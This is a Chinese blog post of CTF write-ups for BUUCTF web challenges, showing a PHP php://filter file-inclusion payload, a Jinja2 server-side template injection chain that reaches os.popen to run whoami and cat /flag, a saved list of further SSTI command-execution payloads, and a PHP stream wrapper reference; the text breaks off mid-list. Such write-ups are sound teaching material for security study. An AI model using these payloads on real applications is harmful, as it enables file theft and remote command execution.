<!DOCTYPE html>



  


<html class="theme-next gemini use-motion" lang="en">
<head>
  <meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>
<meta name="theme-color" content="#222">
<script src="//cdn.bootcss.com/pace/1.0.2/pace.min.js"></script>
<link href="//cdn.bootcss.com/pace/1.0.2/themes/pink/pace-theme-flash.css" rel="stylesheet">
<style>
    .pace .pace-progress {
        background: #000000; /*进度条颜色*/
        height: 3px;
    }
    .pace .pace-progress-inner {
         box-shadow: 0 0 10px #1E92FB, 0 0 5px     #1E92FB; /*阴影颜色*/
    }
    .pace .pace-activity {
        border-top-color: #808080;    /*上边框颜色*/
        border-left-color: #808080;    /*左边框颜色*/
    }
</style>



  
  
    
    
  <script src="/lib/pace/pace.min.js?v=1.0.2"></script>
  <link href="/lib/pace/pace-theme-minimal.min.css?v=1.0.2" rel="stylesheet">







<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css" />







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css" />

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css" />


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=5.1.4">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.4" color="#222">





  <meta name="keywords" content="CTF,Nepnep," />





  <link rel="alternate" href="/rss2.xml" title="diao-diao-UPUP" type="application/atom+xml" />






<meta name="description" content="这是加入Nepnep战队之后的第一次刷题记录,由于要求刷题记录5题一篇文章，所以在这里做出一个改变 [ACTF2020 新生赛]Include测试过程打开环境之后，发现有个链接，点击一下 点击之后得到这样一个界面，发现URL上有一个file变量，可以判断是使用伪协议来进行来进行文件的读取所以先常规查看一下index.php的内容pyload:1php:&#x2F;&#x2F;filter&#x2F;read=convert.b">
<meta name="keywords" content="CTF,Nepnep">
<meta property="og:type" content="article">
<meta property="og:title" content="BUUCTF-Nepnep-0">
<meta property="og:url" content="http:&#x2F;&#x2F;yoursite.com&#x2F;2020&#x2F;05&#x2F;08&#x2F;BUUCTF-Nepnep-0&#x2F;index.html">
<meta property="og:site_name" content="diao-diao-UPUP">
<meta property="og:description" content="这是加入Nepnep战队之后的第一次刷题记录,由于要求刷题记录5题一篇文章，所以在这里做出一个改变 [ACTF2020 新生赛]Include测试过程打开环境之后，发现有个链接，点击一下 点击之后得到这样一个界面，发现URL上有一个file变量，可以判断是使用伪协议来进行来进行文件的读取所以先常规查看一下index.php的内容pyload:1php:&#x2F;&#x2F;filter&#x2F;read=convert.b">
<meta property="og:locale" content="en">
<meta property="og:image" content="http:&#x2F;&#x2F;yoursite.com&#x2F;images&#x2F;Nepnep&#x2F;ACTF2020新生赛Include-0.png">
<meta property="og:image" content="http:&#x2F;&#x2F;yoursite.com&#x2F;images&#x2F;Nepnep&#x2F;fakegoogle0.png">
<meta property="og:image" content="http:&#x2F;&#x2F;yoursite.com&#x2F;images&#x2F;Nepnep&#x2F;[BJDCTF2nd]old-hack0.png">
<meta property="og:image" content="http:&#x2F;&#x2F;yoursite.com&#x2F;images&#x2F;Nepnep&#x2F;[BJDCTF2nd]old-hack1.png">
<meta property="og:image" content="http:&#x2F;&#x2F;yoursite.com&#x2F;images&#x2F;Nepnep&#x2F;[BJDCTF2nd]old-hack2.png">
<meta property="og:updated_time" content="2020-05-08T13:36:09.821Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http:&#x2F;&#x2F;yoursite.com&#x2F;images&#x2F;Nepnep&#x2F;ACTF2020新生赛Include-0.png">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Gemini',
    version: '5.1.4',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: 'Author'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="http://yoursite.com/2020/05/08/BUUCTF-Nepnep-0/"/>





  <title>BUUCTF-Nepnep-0 | diao-diao-UPUP</title>
  








</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="en">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/"  class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">diao-diao-UPUP</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle">我是一只web狗</p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-question-circle"></i> <br />
            
            Home
          </a>
        </li>
      
        
        <li class="menu-item menu-item-about">
          <a href="/about" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-question-circle"></i> <br />
            
            About
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-question-circle"></i> <br />
            
            Tags
          </a>
        </li>
      
        
        <li class="menu-item menu-item-categories">
          <a href="/categories" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-question-circle"></i> <br />
            
            Categories
          </a>
        </li>
      

      
        <li class="menu-item menu-item-search">
          
            <a href="javascript:;" target="_blank" rel="noopener" class="popup-trigger">
          
            
              <i class="menu-item-icon fa fa-search fa-fw"></i> <br />
            
            Search
          </a>
        </li>
      
    </ul>
  

  
    <div class="site-search">
      
  <div class="popup search-popup local-search-popup">
  <div class="local-search-header clearfix">
    <span class="search-icon">
      <i class="fa fa-search"></i>
    </span>
    <span class="popup-btn-close">
      <i class="fa fa-times-circle"></i>
    </span>
    <div class="local-search-input-wrapper">
      <input autocomplete="off"
             placeholder="Searching..." spellcheck="false"
             type="text" id="local-search-input">
    </div>
  </div>
  <div id="local-search-result"></div>
</div>



    </div>
  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://yoursite.com/2020/05/08/BUUCTF-Nepnep-0/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="51nd0re1">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="/images/header.jpg">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="diao-diao-UPUP">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">BUUCTF-Nepnep-0</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">Posted on</span>
              
              <time title="Post created" itemprop="dateCreated datePublished" datetime="2020-05-08T12:14:29+08:00">
                2020-05-08
              </time>
            

            

            
          </span>

          
            <span class="post-category" >
            
              <span class="post-meta-divider">|</span>
            
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              
                <span class="post-meta-item-text">In</span>
              
              
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/WP/" itemprop="url" rel="index">
                    <span itemprop="name">WP</span>
                  </a>
                </span>

                
                
                  , 
                
              
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/WP/WEB/" itemprop="url" rel="index">
                    <span itemprop="name">WEB</span>
                  </a>
                </span>

                
                
              
            </span>
          

          
            
          

          
          

          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <p>这是加入Nepnep战队之后的第一次刷题记录,由于要求刷题记录5题一篇文章，所以在这里做出一个改变</p>
<h1 id="ACTF2020-新生赛-Include"><a href="#ACTF2020-新生赛-Include" class="headerlink" title="[ACTF2020 新生赛]Include"></a>[ACTF2020 新生赛]Include</h1><h2 id="测试过程"><a href="#测试过程" class="headerlink" title="测试过程"></a>测试过程</h2><p>打开环境之后，发现有个链接，点击一下<br><img src="/images/Nepnep/ACTF2020新生赛Include-0.png" alt="avatar"></p>
<p>点击之后得到这样一个界面，发现URL上有一个file变量，可以判断是使用伪协议来进行来进行文件的读取<br>所以先常规查看一下index.php的内容<br>pyload:<br><figure class="highlight livecodeserver"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">php://<span class="built_in">filter</span>/<span class="built_in">read</span>=<span class="built_in">convert</span>.base64-encode/resource=index.php</span><br></pre></td></tr></table></figure><br>经过base64转码后得到index.php的代码：<br><figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">&lt;meta charset=<span class="string">"utf8"</span>&gt;</span><br><span class="line">&lt;?php</span><br><span class="line">error_reporting(<span class="number">0</span>);</span><br><span class="line"><span class="variable">$file</span> = <span class="variable">$_GET</span>[<span class="string">"file"</span>];</span><br><span class="line"><span class="keyword">if</span>(stristr(<span class="variable">$file</span>,<span class="string">"php://input"</span>) || stristr(<span class="variable">$file</span>,<span class="string">"zip://"</span>) || stristr(<span class="variable">$file</span>,<span class="string">"phar://"</span>) || stristr(<span class="variable">$file</span>,<span class="string">"data:"</span>))&#123;</span><br><span class="line">	<span class="keyword">exit</span>(<span class="string">'hacker!'</span>);</span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">if</span>(<span class="variable">$file</span>)&#123;</span><br><span class="line">	include(<span class="variable">$file</span>);</span><br><span class="line">&#125;<span class="keyword">else</span>&#123;</span><br><span class="line">	echo <span class="string">'&lt;a href="?file=flag.php"&gt;tips&lt;/a&gt;'</span>;</span><br><span class="line">&#125;</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure><br>这段代码还是很简单的，就是利用了stristr函数来对几个常见的伪协议进行搜索，如果搜索到使用了这几个伪协议那就判断为hacker!</p>
<p>类似于正则，但是没有正则灵活吧</p>
<p>这里分析看到并没有过滤php://filter，所以直接使用读取flag.php<br>pyload:<br><figure class="highlight livecodeserver"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">php://<span class="built_in">filter</span>/<span class="built_in">read</span>=<span class="built_in">convert</span>.base64-encode/resource=flag.php</span><br></pre></td></tr></table></figure><br>得到flag,属于送分题类型</p>
<h1 id="BJDCTF-2nd-fake-google"><a href="#BJDCTF-2nd-fake-google" class="headerlink" title="[BJDCTF 2nd]fake google"></a>[BJDCTF 2nd]fake google</h1><h2 id="分析"><a href="#分析" class="headerlink" title="分析"></a>分析</h2><p>这个题打开之后是个google搜索，随便在框内输入，然后点击搜索后，在页面看到了我输入的内容，发现没有什么东西，查看源码之后得到了提示：<br><figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">&lt;!--ssssssti &amp; a little trick --&gt;</span></span><br></pre></td></tr></table></figure><br>这里不知道是什么意思，在网上搜索了之后发现是ssti注入</p>
<p>我这里参考了这篇文章<br><a href="https://xz.aliyun.com/t/3679#toc-9" target="_blank" rel="noopener">https://xz.aliyun.com/t/3679#toc-9</a></p>
<p>造成模板注入的原因与一般注入相同，都是渲染的模板可以受用户控制且过分相信了用户的输入而造成了模板注入</p>
<h2 id="知识点"><a href="#知识点" class="headerlink" title="知识点"></a>知识点</h2><p>类似于这样的模板：<br><figure class="highlight dust"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="xml"><span class="tag">&lt;<span class="name">html</span>&gt;</span></span></span><br><span class="line"></span><br><span class="line"><span class="xml"> <span class="tag">&lt;<span class="name">div</span>&gt;</span></span><span class="template-variable">&#123;$what&#125;</span><span class="xml"><span class="tag">&lt;/<span class="name">div</span>&gt;</span></span></span><br><span class="line"></span><br><span class="line"><span class="xml"> <span class="tag">&lt;/<span class="name">html</span>&gt;</span></span></span><br></pre></td></tr></table></figure><br>$what会接受用户输入的值，例如用户输入xxx，那么这个模板经过渲染后就会变为<br><figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">html</span>&gt;</span></span><br><span class="line"></span><br><span class="line"> <span class="tag">&lt;<span class="name">div</span>&gt;</span>xxx<span class="tag">&lt;/<span class="name">div</span>&gt;</span></span><br><span class="line"></span><br><span class="line"> <span class="tag">&lt;/<span class="name">html</span>&gt;</span></span><br></pre></td></tr></table></figure><br>这样就是模板受用户控制</p>
<h3 id="jiajia2的基本语法"><a href="#jiajia2的基本语法" class="headerlink" title="jiajia2的基本语法"></a>jiajia2的基本语法</h3><figure class="highlight crystal"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="template-variable">&#123;&#123;config&#125;&#125;</span>可以获取当前设置</span><br><span class="line"><span class="template-variable">&#123;&#123;<span class="keyword">self</span>&#125;&#125;</span></span><br><span class="line"><span class="template-variable">&#123;&#123;<span class="keyword">self</span>.__dict__._TemplateReference__context.config&#125;&#125;</span> 同样可以看到config</span><br><span class="line"><span class="template-variable">&#123;&#123;&#125;&#125;</span>为变量</span><br><span class="line">&#123;<span class="comment"># #&#125;为注释</span></span><br><span class="line"><span class="template-variable">&#123;% %&#125;</span>内可以写代码</span><br></pre></td></tr></table></figure>
<p>另外得知jiajia2貌似是基于flask框架的，所以再补充一下python的知识<br><figure class="highlight markdown"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="strong">__class__</span> 返回类型所属的对象</span><br><span class="line"><span class="strong">__subclasses__</span> 返回该对象所在类的子类</span><br><span class="line"><span class="strong">__init__</span> 类的初始化方法</span><br><span class="line"><span class="strong">__globals__</span> 对包含函数全局变量的字典的引用</span><br><span class="line"><span class="strong">__mro__</span> 返回该对象的所有类，包括父类</span><br><span class="line"><span class="strong">__bases__</span> 返回该对象所继承的基类 <span class="strong">__builtins__</span>是做为默认初始模块</span><br></pre></td></tr></table></figure><br>根据这些，以及参考的资料，首先对其进行测试</p>
<h2 id="测试过程-1"><a href="#测试过程-1" class="headerlink" title="测试过程"></a>测试过程</h2><p>pyload:<br><figure class="highlight angelscript"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">qaq?name=&#123;&#123;<span class="number">2</span>*<span class="number">2</span>&#125;&#125;</span><br></pre></td></tr></table></figure><br><img src="/images/Nepnep/fakegoogle0.png" alt="avatar"></p>
<p>验证了存在ssti注入<br>首先使用()配合空字符串，加上<strong>class</strong>来查看类<br><figure class="highlight sqf"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">qaq?<span class="built_in">name</span>=&#123;&#123;().<span class="variable">__class__</span>&#125;&#125;</span><br></pre></td></tr></table></figure><br>得到class ‘tuple’，成功之后在使用_bases_来查看继承的基类<br><figure class="highlight reasonml"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">qaq?name=&#123;&#123;<span class="literal">()</span>.<span class="module-access"><span class="module"><span class="identifier">__class__</span>.</span><span class="module"><span class="identifier">__bases__</span>&#125;</span></span>&#125;</span><br></pre></td></tr></table></figure><br>得到确实是所有类的父类<class 'object'></p>
<p>接下来选中object类，并且使用subclasses返回它的所有子类</p>
<figure class="highlight reasonml"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">qaq?name=&#123;&#123;<span class="literal">()</span>.<span class="module-access"><span class="module"><span class="identifier">__class__</span>.</span><span class="module"><span class="identifier">__bases__</span>[</span></span><span class="number">0</span>].<span class="constructor">__subclasses__()</span>&#125;&#125;</span><br></pre></td></tr></table></figure>
<p>列出了所有子类,这里要找的是OS所在的warnings.catch_warnings类<br>发现在170个，索引就为169<br><figure class="highlight reasonml"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">qaq?name=&#123;&#123;<span class="literal">()</span>.<span class="module-access"><span class="module"><span class="identifier">__class__</span>.</span><span class="module"><span class="identifier">__bases__</span>[</span></span><span class="number">0</span>].<span class="constructor">__subclasses__()</span><span class="literal">[<span class="number">169</span>]</span>&#125;&#125;</span><br></pre></td></tr></table></figure><br>选中后初始化这个类,并使用globals全局查看里面的方法<br><figure class="highlight reasonml"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">qaq?name=&#123;&#123;<span class="literal">()</span>.<span class="module-access"><span class="module"><span class="identifier">__class__</span>.</span><span class="module"><span class="identifier">__bases__</span>[</span></span><span class="number">0</span>].<span class="constructor">__subclasses__()</span><span class="literal">[<span class="number">169</span>]</span>.<span class="module-access"><span class="module"><span class="identifier">__init__</span>.</span><span class="module"><span class="identifier">__globals__</span>&#125;</span></span>&#125;</span><br></pre></td></tr></table></figure></p>
<p>在这些方法中找到eval,并进行创建<br><figure class="highlight reasonml"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">qaq?name=&#123;&#123;<span class="literal">()</span>.<span class="module-access"><span class="module"><span class="identifier">__class__</span>.</span><span class="module"><span class="identifier">__bases__</span>[</span></span><span class="number">0</span>].<span class="constructor">__subclasses__()</span><span class="literal">[<span class="number">169</span>]</span>.<span class="module-access"><span class="module"><span class="identifier">__init__</span>.</span><span class="module"><span class="identifier">__globals__</span>.</span><span class="module"><span class="identifier">__builtins__</span>[</span></span>%<span class="number">27</span>eval%<span class="number">27</span>]&#125;&#125;</span><br></pre></td></tr></table></figure><br>接下来import OS ,并执行whoami命令查看是否可以运行<br><figure class="highlight markdown"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">qaq?name=&#123;&#123;().<span class="strong">__class__</span>.<span class="strong">__bases__</span>[<span class="string">0</span>].<span class="strong">__subclasses__</span>()[<span class="string">169</span>].<span class="strong">__init__</span>.<span class="strong">__globals__</span>.<span class="strong">__builtins__</span>[<span class="string">%27eval%27</span>](<span class="link">"__import__(%27os%27</span>).popen(%27whoami%27).read()")&#125;&#125;</span><br></pre></td></tr></table></figure><br>得到了ctf，证明可以正常运行，接下来就cat /flag<br><figure class="highlight markdown"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">qaq?name=&#123;&#123;().<span class="strong">__class__</span>.<span class="strong">__bases__</span>[<span class="string">0</span>].<span class="strong">__subclasses__</span>()[<span class="string">169</span>].<span class="strong">__init__</span>.<span class="strong">__globals__</span>.<span class="strong">__builtins__</span>[<span class="string">%27eval%27</span>](<span class="link">"__import__(%27os%27</span>).popen(%27cat%20/flag%27).read()")&#125;&#125;</span><br></pre></td></tr></table></figure></p>
<p>成功得到了flag</p>
<h2 id="SSTI注入-POC收藏"><a href="#SSTI注入-POC收藏" class="headerlink" title="SSTI注入-POC收藏"></a>SSTI注入-POC收藏</h2><p>另外还在网上看到了很多POC 这里收藏一下<br><figure class="highlight markdown"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">第二种</span><br><span class="line">或者找到os.<span class="emphasis">_wrap_</span>close模块 117个</span><br><span class="line">&#123;&#123;"".<span class="strong">__class__</span>.<span class="strong">__bases__</span>[<span class="string">0</span>].<span class="strong">__subclasses__</span>()[<span class="string">117</span>].<span class="strong">__init__</span>.<span class="strong">__globals__</span>[<span class="string">'popen'</span>](<span class="link">'dir'</span>).read()&#125;&#125;  </span><br><span class="line">当前文件夹</span><br><span class="line">&#123;&#123;"".<span class="strong">__class__</span>.<span class="strong">__bases__</span>[<span class="string">0</span>].<span class="strong">__subclasses__</span>()[<span class="string">117</span>].<span class="strong">__init__</span>.<span class="strong">__globals__</span>[<span class="string">'popen'</span>](<span class="link">'cat /flag'</span>).read()&#125;&#125;</span><br><span class="line">来打开文件，payload有很多慢慢摸索慢慢积累= =</span><br></pre></td></tr></table></figure><br><figure class="highlight markdown"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">第三种</span><br><span class="line">&#123;&#123;().<span class="strong">__class__</span>.<span class="strong">__bases__</span>[<span class="string">0</span>].<span class="strong">__subclasses__</span>()[<span class="string">177</span>].<span class="strong">__init__</span>.<span class="strong">__globals__</span>.<span class="strong">__builtins__</span>[<span class="string">'open'</span>](<span class="link">'/flag'</span>).read()&#125;&#125;</span><br></pre></td></tr></table></figure><br><figure class="highlight django"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="xml">第四种</span></span><br><span class="line"><span class="template-tag">&#123;% <span class="name"><span class="name">for</span></span> c <span class="keyword">in</span> [].__class__.__base__.__subclasses__() %&#125;</span><span class="template-tag">&#123;% <span class="name"><span class="name">if</span></span> c.__name__=='catch_warnings' %&#125;</span><span class="template-variable">&#123;&#123; c.__init__.__globals__['__builtins__'].eval("__import__('os').popen('ls /').read()")&#125;&#125;</span><span class="template-tag">&#123;% <span class="name"><span class="name">endif</span></span> %&#125;</span><span class="template-tag">&#123;% <span class="name"><span class="name">endfor</span></span> %&#125;</span></span><br><span class="line"></span><br><span class="line"><span class="template-tag">&#123;% <span class="name"><span class="name">for</span></span> c <span class="keyword">in</span> [].__class__.__base__.__subclasses__() %&#125;</span><span class="template-tag">&#123;% <span class="name"><span class="name">if</span></span> c.__name__=='catch_warnings' %&#125;</span><span class="template-variable">&#123;&#123; c.__init__.__globals__['__builtins__'].eval("__import__('os').popen('cat /flag').read()")&#125;&#125;</span><span class="template-tag">&#123;% <span class="name"><span class="name">endif</span></span> %&#125;</span><span class="template-tag">&#123;% <span class="name"><span class="name">endfor</span></span> %&#125;</span></span><br></pre></td></tr></table></figure></p>
<h1 id="ZJCTF-2019-NiZhuanSiWei"><a href="#ZJCTF-2019-NiZhuanSiWei" class="headerlink" title="[ZJCTF 2019]NiZhuanSiWei"></a>[ZJCTF 2019]NiZhuanSiWei</h1><h2 id="分析-1"><a href="#分析-1" class="headerlink" title="分析"></a>分析</h2><p>打开之后看到源码<br><figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php  </span><br><span class="line"><span class="variable">$text</span> = <span class="variable">$_GET</span>[<span class="string">"text"</span>];</span><br><span class="line"><span class="variable">$file</span> = <span class="variable">$_GET</span>[<span class="string">"file"</span>];</span><br><span class="line"><span class="variable">$password</span> = <span class="variable">$_GET</span>[<span class="string">"password"</span>];</span><br><span class="line"><span class="keyword">if</span>(isset(<span class="variable">$text</span>)&amp;&amp;(file_get_contents(<span class="variable">$text</span>,<span class="string">'r'</span>)===<span class="string">"welcome to the zjctf"</span>))&#123;</span><br><span class="line">    echo <span class="string">"&lt;br&gt;&lt;h1&gt;"</span>.file_get_contents(<span class="variable">$text</span>,<span class="string">'r'</span>).<span class="string">"&lt;/h1&gt;&lt;/br&gt;"</span>;</span><br><span class="line">    <span class="keyword">if</span>(preg_match(<span class="string">"/flag/"</span>,<span class="variable">$file</span>))&#123;</span><br><span class="line">        echo <span class="string">"Not now!"</span>;</span><br><span class="line">        <span class="keyword">exit</span>(); </span><br><span class="line">    &#125;<span class="keyword">else</span>&#123;</span><br><span class="line">        include(<span class="variable">$file</span>);  <span class="regexp">//u</span>seless.php</span><br><span class="line">        <span class="variable">$password</span> = unserialize(<span class="variable">$password</span>);</span><br><span class="line">        echo <span class="variable">$password</span>;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">else</span>&#123;</span><br><span class="line">    highlight_file(__FILE__);</span><br><span class="line">&#125;</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure><br>可以看到需要text file和password三个参数满足条件，才会输出flag</p>
<p>先分析一下text参数<br>text参数先判断了是否存在，如果存在则使用file_get_contents($text,’r’)</p>
<p>查阅了一下百度，file_get_contents() 是把文件读入一个字符串，所以可得知，需要将welcome to the zjctf输入到文件中，然后进行查询，才能满足条件</p>
<p>file则是需要包含useless.php</p>
<p>password则是需要进行反序列化操作</p>
<p>所以先想到使用伪协议来将welcome to the zjctf读入到文件中，然后再使用伪协议读取useless.php的内容，猜测useless.php中的内容就是password需要的反序列化内容</p>
<p>这里伪协议做一个补充</p>
<h2 id="知识点-1"><a href="#知识点-1" class="headerlink" title="知识点"></a>知识点</h2><h3 id="PHP支持的伪协议"><a href="#PHP支持的伪协议" class="headerlink" title="PHP支持的伪协议"></a>PHP支持的伪协议</h3><figure class="highlight dts"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="symbol">file:</span><span class="comment">// — 访问本地文件系统</span></span><br><span class="line"><span class="symbol">http:</span><span class="comment">// — 访问 HTTP(s) 网址</span></span><br><span class="line"><span class="symbol">ftp:</span><span class="comment">// — 访问 FTP(s) URLs</span></span><br><span class="line"><span class="symbol">php:</span><span class="comment">// — 访问各个输入/输出流（I/O streams）</span></span><br><span class="line"><span class="symbol">zlib:</span><span class="comment">// — 压缩流</span></span><br><span class="line"><span class="symbol">data:</span><span class="comment">// — 数据（RFC 2397）</span></span><br><span class="line"><span class="symbol">glob:</span><span class="comment">// — 查找匹配的文件路径模式</span></span><br><span class="line"><span class="symbol">phar:</span><span class="comment">// — PHP 归档</span></span><br><span class="line"><span class="symbol">ssh2:</span><span class="comment">// — Secure Shell 2</span></span><br><span class="line"><span class="symbol">rar:</span><span class="comment">// — RAR</span></span><br><span class="line"><span class="symbol">ogg:</span><span class="comment">// — 音频流</span></span><br><span class="line"><span class="symbol">expect:</span><span class="comment">// — 处理交互式的流</span></span><br></pre></td></tr></table></figure>
<p>常用的伪协议：<br><figure class="highlight livecodeserver"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">php://<span class="built_in">filter</span>  <span class="comment"> //经常使用的伪协议，一般用于任意文件读取，有时也可以用于getshell.</span></span><br><span class="line">可以跟的参数有resource=&lt;要过滤的数据流&gt;  <span class="built_in">read</span>=&lt;读链的筛选列表&gt;  <span class="built_in">write</span>=&lt;写链的筛选列表&gt;</span><br><span class="line">常用语句：php://<span class="built_in">filter</span>/<span class="built_in">read</span>=<span class="built_in">convert</span>.base64-encode/resource=index.php  <span class="built_in">read</span>/<span class="built_in">write</span>参数替换<span class="built_in">read</span>的位置即可  resource为必须的参数</span><br><span class="line"></span><br><span class="line">php://input  <span class="comment"> //php://input可以访问请求的原始数据的只读流，将post请求的数据当作php代码执行</span></span><br><span class="line"></span><br><span class="line"><span class="built_in">file</span>://   <span class="comment"> //file://伪协议在双OFF的时候也可以用，用于本地文件包含  file://协议必须是绝对路径</span></span><br><span class="line"></span><br><span 